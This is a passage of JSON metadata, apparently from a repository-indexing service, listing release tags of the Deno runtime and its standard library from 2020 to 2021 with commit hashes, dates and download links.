ies/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490